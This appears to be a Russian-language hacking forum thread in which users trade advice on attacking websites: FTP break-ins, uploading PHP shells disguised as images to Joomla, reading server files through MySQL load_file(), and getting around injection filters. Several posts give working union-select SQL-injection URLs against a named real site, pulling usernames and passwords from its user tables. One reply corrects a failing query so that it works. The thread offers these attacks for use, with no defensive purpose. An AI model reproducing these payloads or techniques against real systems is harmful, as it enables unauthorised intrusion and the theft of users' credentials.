Интересуют уязвимомости и методы взлома Ftp, по возможности приводите ссылки, а то юзал поиск, поиск особых результатов не дал
frigid20, просто ты неправильно юзаешь. Вот правильно. Тебе осталось найти папку с правами на запись.
Всвязи с какими ошибками JOOMLA выдаёт сообщение на заливку шелла вида .php.gif - Фаил трататата не может быть показан,так как содержит ошибки. Версия JOOMLA 1.0.11
Велемир, напиши по порядку действия, которые ты делаешь. И не забывай, что шелл-картинка работает только при инклюде.
Если через PHP include,то его я пока не нашёл.Load_File() не читает почему-то,хотя несколько условий соблюдаются: 1.Фаил расположен на сервере 2.Hex значения принимаются Но вот насчёт третьего условия (права доступа к файлу) я сомневаюсь,так как при пхп инклуде и при лоад файле пользователи от разных приложений (я так думаю,но не факт,что это так)) ),ибо при пхп инклуде всё выходит.Запрет на load_file()...может,и действительно запрет,так как доказать я этого не смогу всвязи с отсутствием вывода ошибок.А так было бы высело почитать файлики.На одном сервере так вообще были рутовые права,т.к. бд под рутом была,что достаточно редко бывает, а лоад файлом прочесть ничего не смог.Вот и облом.Кто-то так пошутил нехорошо))) Кстати,вопрос в студию,который меня очень долго мучает: От каких серверных(или Бог знает каких) настроек зависит вывод списка директорий с помощь load_file() ? Пару раз всего смог так наслаждаться прогулкой по серверу
Велемир, ты очень много всего сказал и из этого дельного - пара фраз)) Короче, load_file() может не работать из-за выключенного file_priv на пользователе из-под которого ты работаешь. И ещё одно - load_file() вообще не исполняет php код. Так что шелл-картинка не заработает через load_file(). upd: Чтоб узнать есть ли права на чтение файлов с помощью load_file() не обязательно иметь вывод ошибок. Тем более даже вывод ошибок ничего не даст, за редким исключением. Надеюсь, на твои вопросы ответил, ибо вообще их не понял)
А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.
geforce, http://milw0rm.com/ http://packetstormsecurity.net/ http://google.com/ з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(
http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7&Itemid=31 how to inject this i tried after http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7'&Itemid=31 and http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7&Itemid=31' doesnt work is this filtered how to bybass waitting.............................
Народ вот такая проблема Сайт:http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/* Дальше роем и находим таблицы user -user_name -user_password tbl_user -u_username -u_password -u_email punbb_users -id -username -password -email составляем запросы Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+tbl_user+limit+1,1/* и Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/* Но сайт упорно не хочет показывать содержимое таблиц что делать чтобы оно показало?
Там таблицы те лежат просто в другой БД Code: http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+moxieforge.tbl_user+limit+1,1/*
Начнем с того что никакого мата вовсе и небыло! А для тугих задаю вопрос вновь, какие уязвим есть У phpBB 3.0.1 ?? Эт ты к чему говоришь? Всмысле тебе меня жаль? Ты не знаешь должны мне здесь или нет по этому попрошу без своего трёх капеечного флуда по этой теме лучшеб подсказала!
Попробу сначало посмотреть что там вобще имеется http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_name,8+from+information_schema.tables/**/
1)Для тугих будешь вопросы повторять в другом месте. 2)За это время уже и сам мог баги поискать. Или на других форумах. 3)Спайдер не девушка.
